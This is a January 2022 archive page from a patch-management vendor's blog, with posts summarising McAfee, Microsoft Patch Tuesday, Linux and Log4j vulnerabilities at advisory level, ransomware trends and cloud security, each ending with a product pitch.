Skip to main content
Monthly Archives

January 2022

||

Critical Bug Can Be Exploited to Gain Windows SYSTEM Privileges

By Blog, NewsNo Comments

Critical Bug Can Be Exploited to Gain Windows SYSTEM Privileges

McAfee has patched two severe vulnerabilities in a component of its McAfee Enterprise product that attackers can use to escalate privileges.

New Critical Vulnerability

McAfee has patched two high-severity vulnerabilities in a component of its McAfee Enterprise product that attackers can use to escalate privileges, including up to SYSTEM.

According to McAfee’s bulletin, the bugs are in versions prior to 5.7.5 of McAfee Agent, which is used in McAfee Endpoint Security, among other McAfee products. 

The Agent is the piece of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces policies and executes client-side tasks such as deployment and updating. 

The McAfee Agent is also the component that uploads events and provides additional data regarding each system’s status. Periodically collecting and sending event information to the McAfee ePO server, the Agent – which also installs and updates endpoint products – is a required install on any network system that needs to be managed.

How Syxsense Can Help

Syxsense has automated the entire process of patch management.

  • It automates testing of patches yet gets them deployed within three hours of receipt.
  • It automates patch deployment so the right patches make it to every endpoint.
  • It automates patch rollback in case of any issues or incompatibilities.
  • It automates the prioritization and sequencing of patches so those that represent the biggest threat are sent out first.

Syxsense also automates vulnerability scanning so that scans are done regularly to determine potential issues such as missing patches, open ports, and other vulnerabilities.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 24, 2022
Love1
|||

Watch the Webcast: January Patch Tuesday 2022

By News, Patch Tuesday, VideoNo Comments

Watch the Webcast: January Patch Tuesday 2022

Watch this week's webcast to hear IT industry experts discuss strategies for tackling Microsoft's January Patch Tuesday updates.

Watch the January Patch Tuesday 2022 Webcast

New year, new Patch Tuesday — start 2022 ahead of the latest threats and vulnerabilities.

Industry experts discuss each of this month’s bulletins and show you strategies for tackling the most important updates.

Our team of IT management experts has deployed over 100 million patches. Sign up for our free webinar to receive the top patch strategies of the month.

View the Webcast

What You Need to Know: January Patch Tuesday 2022

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 12, 2022
Love0
|||

Ransomware Is Bad and Getting Worse

By BlogNo Comments

Ransomware Is Bad and Getting Worse

A ransomware expert cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

Changes for Ransomware In 2022

Roger Grimes, a ransomware expert at KnowBe4 cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

“The cybersecurity industry is not yet capable of implementing a robust defense to even slow the continued increase in cybercrime, much less actually lessen it,” he said.

He noted that ransomware gangs had graduated beyond mere ransom collection. Yes, they still rake in billions. But they are also stealing intellectual property, corporate data, and credentials. In addition, the use the data to threaten the victim’s employees and customers, publicly shame organizations, and use their insider information to conduct spear phishing.

In other words, these new tactics mean that backup won’t protect the victims. Yes, a backup may help a company avoid paying the ransom. But the cybercriminals can still leverage all these other avenues to cause real problems – and ultimately force payment.

According to Coveware, 81% of ransomware gangs threaten to leak exfiltrated data. As a result, more than 60% of victims now pay the ransom. The average ransomware payment is up to $280,000 and rising steadily, along with cyber insurance premiums.

And Grimes predicts things will worsen once again. He said the bad guys are maximizing revenue potential by selling stolen data, credentials, access, money, and also going after individuals within companies, as well as organizations as a whole. They have evolved hacking-for-hire schemes, they offer product lists for sale, and in general are acting like a high-end marketing department in exploring and developing innovative new sales channels.

Anyone suffering a ransomware attack, therefore, had better do a thorough forensic examination to see how the attack began, where it spread to laterally, any backdoors introduced, credentials hacked and more. A vulnerability scan should of course be done to determine any remaining vulnerabilities and all of them need to be fixed.

 

Combined Ransomware Attacks

Two-pronged attacks are becoming common tactics from cybercriminals. They might quietly do some crypto mining in a site and then launch ransomware. Or they can make a ransom demand and at the same time attack their website and take down current revenue channels. The resulting financial stress makes it easier to extort the money.

As we move forward, further automation and streamlining of attacks is likely to be observed. For example, a successful incursion using a bot may result in the automatic installation of malicious program, collection of some passwords, and a scan of the environment to gather key details. At that point, the attack is escalated to senior hackers who research the potential in the environment and determine the most lucrative strategy to exploit. This is similar to how IT is operating today, and how IT is evolving: Routine actions and labor-intensive actions are automated, and alerts and exceptions are passed on to IT personnel to decide what to do.

Just as automation has become the go-to tool for hackers and is being introduced into more and more areas of IT operations and maintenance, it is automation that can help fight the battle against rampant ransomware.

How Syxsense Can Help

Syxsense has automated the entire process of patch management.

  • It automates testing of patches yet gets them deployed within three hours of receipt.
  • It automates patch deployment so the right patches make it to every endpoint.
  • It automates patch rollback in case of any issues or incompatibilities.
  • It automates the prioritization and sequencing of patches so those that represent the biggest threat are sent out first.

Syxsense also automates vulnerability scanning so that scans are done regularly to determine potential issues such as missing patches, open ports, and other vulnerabilities.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 12, 2022
Love0
||

January Patch Tuesday 2022 Fixes 96 Critical Issues

By News, Patch Management, Patch TuesdayNo Comments

January Patch Tuesday 2022 Fixes 96 Critical Issues

With 96 new bugs, Microsoft is kicking off the first Patch Tuesday of 2022 with a bang. There are 8 Critical and 88 Important fixes.

Microsoft Patch Tuesday Released with 96 Fixes

There are 8 Critical (one more than last month) and 88 Important fixes in this release. Updates were included for Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop. 

Year 2 Extended Support – Windows 7 and Windows Server 2008 (including R2) have received some updates this month. Next month you need to renew for a third ESU if you are still using Windows 7 or 2008 R2.

The first Patch Tuesday of the year has arrived with a bang, and just in time for many of our customers who are ending their change freeze following the New Year holidays.  We do not have any confirmed Weaponized threats to deal with this month so far, however we do have 6 confirmed Public Aware threats which could be weaponized at any minute.”

Syxsense Recommendations

Based on the Vendor Severity & CVSS Score, we have made a few recommendations below. As usual we recommend our customers enter the CVE numbers below into your Patch Management solution and deploy as soon as possible.

Top January 2022 Patches and Vulnerabilities

1. CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability

The vulnerability exists due to a boundary error within the HTTP Trailer Support feature in HTTP Protocol Stack (http.sys). A remote attacker can send a specially crafted HTTP request to the web server, trigger a buffer overflow and execute arbitrary code on the system. Microsoft recommends prioritizing the patching of affected devices because it is suspected to be wormable.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 9.8
  • Weaponized: No
  • Public Aware: Yes
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

2. CVE-2022-21849: Windows IKE Extension Remote Code Execution Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input Windows IKE Extension. A remote attacker can pass specially crafted input to the application and perform a denial of service (DoS) attack. In an environment where Internet Key Exchange (IKE) version 2 is enabled, a remote attacker could trigger multiple vulnerabilities without being authenticated.

Syxscore

  • Vendor Severity: Important
  • CVSS: 9.8
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

3. CVE-2022-21912: DirectX Graphics Kernel Remote Code Execution Vulnerability

The vulnerability allows a local user to execute arbitrary code on the target system, and successful exploitation of this vulnerability may result in complete compromise of vulnerable system. The authenticated attacker could take advantage of a vulnerability in dxgkrnl.sys to execute an arbitrary pointer dereference in kernel mode. What makes this even worse is an attacker with non-admin credentials can potentially carry out an exploit using this vulnerability.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 7.8
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: Yes

Syxscore Risk

  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges: Low
  • User Interaction: None
  • Scope (Jump Point): Yes

Syxsense Recommendations

Based on the Vendor Severity and CVSS Score, we have made a few recommendations below which you should prioritize this month; please pay close attention to any of these which are Publicly Aware and / or Weaponized.

CVE Reference Description Vendor Severity CVSS Score Weaponised Publicly Aware Countermeasure Highest Priority
CVE-2022-21907 HTTP Protocol Stack Remote Code Execution Vulnerability Critical 9.8 No No Yes Yes
CVE-2022-21849 Windows IKE Extension Remote Code Execution Vulnerability Important 9.8 No No No Yes
CVE-2022-21846 Microsoft Exchange Server Remote Code Execution Vulnerability Critical 9 No No No Yes
CVE-2022-21855 Microsoft Exchange Server Remote Code Execution Vulnerability Important 9 No No No Yes
CVE-2022-21969 Microsoft Exchange Server Remote Code Execution Vulnerability Important 9 No No No Yes
CVE-2022-21901 Windows Hyper-V Elevation of Privilege Vulnerability Important 9 No No No Yes
CVE-2022-21857 Active Directory Domain Services Elevation of Privilege Vulnerability Critical 8.8 No No No Yes
CVE-2022-21840 Microsoft Office Remote Code Execution Vulnerability Critical 8.8 No No No Yes
CVE-2022-21850 Remote Desktop Client Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2022-21851 Remote Desktop Client Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2022-21893 Remote Desktop Protocol Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2022-21922 Remote Procedure Call Runtime Remote Code Execution Vulnerability Important 8.8 No No No Yes
CVE-2022-21920 Windows Kerberos Elevation of Privilege Vulnerability Important 8.8 No No No Yes
CVE-2022-21837 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.3 No No No Yes
CVE-2022-21912 DirectX Graphics Kernel Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2022-21898 DirectX Graphics Kernel Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2022-21917 HEVC Video Extensions Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2022-21833 Virtual Machine IDE Drive Elevation of Privilege Vulnerability Critical 7.8 No No No Yes
CVE-2022-21836 Windows Certificate Spoofing Vulnerability Important 7.8 No Yes No Yes
CVE-2022-21874 Windows Security Center API Remote Code Execution Vulnerability Important 7.8 No Yes No Yes
CVE-2022-21919 Windows User Profile Service Elevation of Privilege Vulnerability Important 7 No Yes No Yes
CVE-2022-21884 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21910 Microsoft Cluster Port Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21835 Microsoft Cryptographic Services Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21841 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2022-21842 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2022-21858 Windows Bind Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21916 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21897 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21852 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21902 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21878 Windows Geolocation Service Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2022-21908 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21888 Windows Modern Execution Server Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2022-21885 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21914 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21895 Windows User Profile Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2022-21891 Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability Important 7.6 No No No
CVE-2022-21932 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability Important 7.6 No No No
CVE-2022-21911 .NET Framework Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21904 Windows GDI Information Disclosure Vulnerability Important 7.5 No No No
CVE-2022-21880 Windows GDI+ Information Disclosure Vulnerability Important 7.5 No No No
CVE-2022-21843 Windows IKE Extension Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21883 Windows IKE Extension Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21848 Windows IKE Extension Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21889 Windows IKE Extension Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21890 Windows IKE Extension Denial of Service Vulnerability Important 7.5 No No No
CVE-2022-21839 Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability Important 6.1 No Yes No
CVE-2022-21869 Clipboard User Service Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21865 Connected Devices Platform Service Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21871 Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21870 Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21861 Task Flow Data Engine Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21873 Tile Data Repository Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21882 Win32k Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21887 Win32k Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21859 Windows Accounts Control Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21860 Windows App Contracts API Server Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21862 Windows Application Model Core API Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21868 Windows Devices Human Interface Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21896 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21872 Windows Event Tracing Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21903 Windows GDI Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21881 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21867 Windows Push Notifications Apps Elevation Of Privilege Vulnerability Important 7 No No
CVE-2022-21863 Windows State Repository API Server file Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21875 Windows Storage Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21866 Windows System Launcher Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21864 Windows UI Immersive Server API Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21834 Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability Important 7 No No
CVE-2022-21892 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21958 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21959 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21960 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21961 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21962 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.8 No No
CVE-2022-21918 DirectX Graphics Kernel File Denial of Service Vulnerability Important 6.5 No No
CVE-2022-21915 Windows GDI+ Information Disclosure Vulnerability Important 6.5 No No
CVE-2022-21847 Windows Hyper-V Denial of Service Vulnerability Important 6.5 No No
CVE-2022-21963 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.4 No No
CVE-2022-21928 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability Important 6.3 No No
CVE-2022-21970 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability Important 6.1 No No
CVE-2022-21964 Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability Important 5.5 No No
CVE-2022-21877 Storage Spaces Controller Information Disclosure Vulnerability Important 5.5 No No
CVE-2022-21876 Win32k Information Disclosure Vulnerability Important 5.5 No No
CVE-2022-21838 Windows Clean up Manager Elevation of Privilege Vulnerability Important 5.5 No No
CVE-2022-21906 Windows Defender Application Control Security Feature Bypass Vulnerability Important 5.5 No No
CVE-2022-21899 Windows Extensible Firmware Interface Security Feature Bypass Vulnerability Important 5.5 No No
CVE-2022-21879 Windows Kernel Elevation of Privilege Vulnerability Important 5.5 No No
CVE-2022-21913 Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass Important 5.3 No No
CVE-2022-21925 Windows Backup Key Remote Protocol Security Feature Bypass Vulnerability Important 5.3 No No
CVE-2022-21924 Workstation Service Remote Protocol Security Feature Bypass Vulnerability Important 5.3 No No
CVE-2022-21900 Windows Hyper-V Security Feature Bypass Vulnerability Important 4.6 No No
CVE-2022-21905 Windows Hyper-V Security Feature Bypass Vulnerability Important 4.6 No No
CVE-2022-21894 Secure Boot Security Feature Bypass Vulnerability Important 4.4 No No
CVE-2022-21921 Windows Defender Credential Guard Security Feature Bypass Vulnerability Important 4.4 No No
Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 11, 2022
Love0
||

Linux Vulnerabilities of the Week: January 10, 2022

By NewsNo Comments

Linux Vulnerabilities of the Week: January 10, 2022

See this week's top Linux issues and keep your IT environment protected from the latest January 2022 Linux vulnerabilities.

1. Mozilla iframe sandbox rules vulnerability

Severity: Critical         CVSS Score: 10.0

Due to incorrect application of iframe sandbox rules to XSLT stylesheets, an iframe can bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-38503

2. Possible buffer overflow in the mod_lua multipart parser affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 9.8

A buffer overflow flaw in httpd’s Lua module could allow an out-of-bounds write. The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44790

3. Remote code execution in Log4j 1.x affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JNDI LDAP endpoint.

This issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached the end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

4. Read buffer overruns processing ASN.1 strings in OpenSSL

Severity: Important    CVSS Score: 7.4

It was found that OpenSSL assumed ASN.1 strings to be NUL terminated. An attacker may be able to force an application into calling OpenSSL function with a specially crafted, non-NUL terminated string to deliberately hit this bug, which may result in a crash of the application, causing a Denial-of-Service attack, or possibly, memory disclosure.

The highest threat from this vulnerability is to data confidentiality and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3712

5. Python-lxml’s HTML flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.1

There’s a flaw in python-lxml’s HTML Cleaner component, which is responsible for sanitizing HTML and JavaScript.

An attacker who can submit a crafted payload to a web service using python-lxml’s HTML Cleaner may be able to trigger script execution in clients such as web browsers.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires user interaction to be exploited, it can be exposed over any network, with a low complexity attack, and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-43818

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 10, 2022
Love0
||

Cloud-Based IT Security Will Dominate in 2022

By NewsNo Comments

Cloud-Based IT Security Will Dominate in 2022

IT professionals will need cloud-based security tools with built-in automation to stay on top of 2022 IT security needs. What's changing?

Cloud-Security Looking to Grow in 2022

The cloud has been gathering momentum for many years. And it is rapidly becoming an unstoppable force. According to the 2022 Technology Spending Intentions report by Enterprise Strategy Group (ESG), cloud spending will far outstrip on-premises spending in 2022.

The report states that two thirds of organizations will raise their budgets for public cloud applications in 2022. 3% will decrease such spending and the remainder said public spending would remain flat. Some of the major factors driving these investment trends include the improvement of the customer experience, making employees more productive, enhancing business processes, and enabling digital transformation.

Digital transformation, it turns out, goes hand in hand with the cloud. Companies have realized that being in the cloud gives them far more architectural flexibility. Those continuing to focus on on-premises technology typically find it more difficult to adopt the latest technologies, harder to transform, and more challenging to streamline processes.

That’s why ESG found that almost half of organizations now regard themselves as cloud-first i.e., when they look to add new technology, expand their operations, or upgrade an application or system, their first option is always to look at how that can be done in the cloud. They deploy any new applications in the public cloud unless someone can make a compelling case to deploy it using on-premises resources. This approach offers them an immediate benefit of transferring CAPEX costs to OPEX. At the same time, it grants them access to cloud technology where vendors take care of all upgrades, back-end systems, and troubleshooting.

Hence, we are seeing the number of traditional data centers and server rooms dwindle. Instead of buying the hardware upfront and paying for annual maintenance, the pendulum has swung to a consumption-based model in which infrastructure is obtained on a pay-per-use basis such as cloud subscriptions. Over the past two years, the number favoring the traditional data center model has dropped by 12%. In 2022, it will drop to 38%.

Beyond costs and access to the latest technology, the move to the cloud is also about a preference for iterative methodologies such as DevOps, agile software development, and adoption of low-code and no-code processes. Cloud-based systems make it far easier for organizations to switch to these modern methodologies. Further, the cloud brings an extra dimension to application development. According to ESG, 60% of organizations are engaged in the development of cloud-native applications.

The Cloud and Digital Transformation Go Hand in Hand

There is no doubt that most organizations see a strong need to digitally transform in order to stay competitive and expand. That’s why so many are gravitating to the cloud. They no longer wish to bog themselves down in internal IT plumbing and maintenance by running a sophisticated modern data center.

At the same time, they are learning that the move to the cloud can help them to enhance security while they digitally transform. The organizational perimeter has evolved over the past two years. There is no going back. No longer can IT shelter employees and systems behind a firewall protecting a physical building and a consolidated network. The genie is out of the bottle. Many work from home. Wi-Fi networks are in heavy use across the geographically distributed enterprise. Applications are now provided by a great many cloud vendors. The centralized security paradigm no longer functions.

How Syxsense Can Help

It takes cloud-based security tools with built-in automation to stay on top of current security needs. Syxsense offers automated, cloud-based patch management and vulnerability scanning tools.

As organizations transition to the cloud, they must ensure that they also transition to security tools such as Syxsense as a key part of their journey.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 7, 2022
Love0
||

Why Hackers are Living the American Dream

By NewsNo Comments

Why Hackers are Living the American Dream

It appears that there is a new American Dream — hackers all over the world are enjoying riches by preying on U.S. businesses and consumers.

A New American Dream for Hackers

The American Dream has long been the ideal whereby anyone living in the country would enjoy equality of opportunity. Hard work would pay off in terms of achievement of aspirations and goals.

Before the USA even achieved independence, the promise of freedom lured many to the new world. But after the attainment of independence, the numbers began to rise dramatically.

Perhaps the greatest wave was around the end of the nineteenth and start of the twentieth centuries when approximately 23 million immigrants settled in the United States. Most came from Southern and Eastern Europe, as well as Scandinavia. They fled their homes due to political upheaval, religious persecution, and a lack of economic opportunities.

The USA represented the opposite – religious freedom, political stability, and plenty of opportunities to move up the economic ladder. To this day, people still flock to the country, hoping for a better life.

Attacks on the Rise

But now it appears that there is a new American Dream – hackers all over the world are enjoying riches by preying on U.S. businesses and consumers. According to security firm Surfshark, the U.S. ranks first worldwide in the number of data breach victims.

Hackers are targeting the nation for two reasons:

  1. The riches of the U.S. make it a high-priority target.
  2. Hackers are finding easy pickings among both the business and consumer markets.

The list shows the USA far ahead of other western nations. With 212.4 million reported and confirmed account breaches, it leaves the UK (16.89 million) and Germany (10.3 million) in the dust. However, there are a couple of anomalies on the list. Iran and India placed second and third, respectively. But overall, it is clear that hackers tend to target the nations with the deepest pockets – hence, the position of the U.S.

Over the past year, accounts breached across the world as a whole jumped by 3.4%. One in five people globally were hacked. Yet the number of affected accounts in the U.S. grew by a much higher rate. It surged by 22%, jumping from 174.4 million to 212.4 million. That trend serves to highlight the intention of hackers to encroach the highest value targets. The U.S. now totals almost a quarter of all accounts breached internationally.

Those hacked not only suffered financial damage courtesy of ransomware, and loss of data. They also had to deal with reputational damage due to private data being stolen or leaked.

Securing the Enterprise

With hackers clearly targeting American accounts, both business and personal, security protections need to be stepped up. This means:

  1. Implementing standard security practices and technologies such as firewalls, intrusion prevention/detection, anti-virus, anti-malware, ransomware protection, security information and event management (SIEM), endpoint protection, and more.
  2. Protecting data via backups and disaster recovery systems. The organization must have the ability to retrieve backup files in the event of a breach or recover rapidly from a disaster or other event.
  3. Patching all organizational endpoints, devices, and servers to eliminate weaknesses that can be exploited by hackers.

Syxsense takes care of number 3. It automates the entire patch management process, prioritizing and deploying patches across the enterprise.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution. It also incorporates vulnerability scanning to detect weaknesses that could lead to a ransomware attack if unmitigated.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 6, 2022
Love0
||

Windows Out-of-Band Update Released to Fix Remote Desktop

By Patch ManagementNo Comments

Windows Out-of-Band Update Released to Fix Remote Desktop

Microsoft has released an emergency security update to fix a Remote Desktop vulnerability in Windows Server running Remote Desktop.

Microsoft Issues Emergency Update for Remote Desktop

Microsoft has released an emergency security update to fix a Remote Desktop vulnerability in Windows Server running Remote Desktop. There is a known issue that might prevent you from using Remote Desktop to reach the server.  In some circumstances, the server might stop responding. The screen might also appear black, and general performance and signing in might be slow.

Rob Brown, Head of Customer Success for Syxsense said, “This is not available via the usual Windows Update or Microsoft update channel / Windows Update for Business or Windows Server Update Service (WSUS), which can make resolving this vulnerability more difficult unless you are using a solution like Syxsense. Alternatively, you may download this patch manually via the Microsoft Catalogue.”

Windows Out-of-Band Updates

For instructions on how to install this update for your operating system, see the KB for your OS listed below:

As always we recommend full testing be performed prior to live deployment to your device, these are now available within the Syxsense Console.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 6, 2022
Love0
||

Are You Taking the Right Precautions Against the Log4j Flaw?

By NewsNo Comments

Are You Taking the Right Precautions Against the Log4j Flaw?

The number of attacks taking advantage of the Log4j zero-day flaw continues to grow. See the steps you should take to protect your business.

Some breaches are more serious than others. And the Log4j Java logging library attack is a doozy! Publicly disclosed in early December, the number of attacks taking advantage of this zero-day flaw continues to grow.

Known formally as the CVE-2021-44228 vulnerability, Log4j makes it possible for remote code execution and access to servers using the Java logging library. Unfortunately, many are unaware that their enterprise systems utilize this Java feature. They might hear the news and yet not realize it applies to them. Hence, the number of incursions has increase markedly in recent weeks despite heavy publicity.

While IT departments may be sleeping at the wheel, hackers have been quick to jump on the Log4j bandwagon. In fact, some were already milking it for all it is worth only hours after it was publicly disclosed. Government sources said more than 100 attempts were made every minute utilizing the vulnerability. Cybersecurity firm Check Point believe that the flaw has been used in attempts to breach more than 40% of global networks.

Ubiquitous Java

What makes it so attractive is the ubiquitous nature of Java. Log4j, it turns out, is embedded in just about any and all Java-based products or web services out there – and that’s a lot! Thus, it is far from easy to manually remediate.

Meanwhile, hackers are unleashing hell on vulnerable systems. Some deliver cryptomining malware. Others use it to steal usernames and passwords to enable them to access networks and systems.

To make matters worse, the public disclosure of the exploit a couple of weeks ago is no guarantee that Log4j is a new phenomenon. How long have attacks been quietly using it to burrow into enterprise systems. No one knows as yet.

Government Panic

Government agencies are in panic one about Log4J. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), for example, ordered all civilian federal agencies to immediately patch this vulnerability as well as others such as the Zoho’s Desktop Central Authentication Bypass vulnerability, Fortinet’s FortiOS Arbitrary File Download vulnerability and Realtek’s Jungle SDK Remote Code Execution vulnerability. CISA is working with multiple cybersecurity companies to shore up breached systems and protect other potential targets.

CISA Director Jen Easterly said this vulnerability poses a severe risk and noted it as being perhaps the most serious she has seen in her career. She urged enterprises to:

1. Enumerate any external facing devices that have Log4j installed.
2. Make sure that your security operations center is actioning every single alert on the devices that fall into the category above.
3. Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts.

However, Log4j is deeply embedded in many Java-based systems and may be difficult to find. It is even used in Supervisory Control and Data Acquisition (SCADA) systems and historian systems used in many industrial and infrastructure systems. 

Patching Log4J

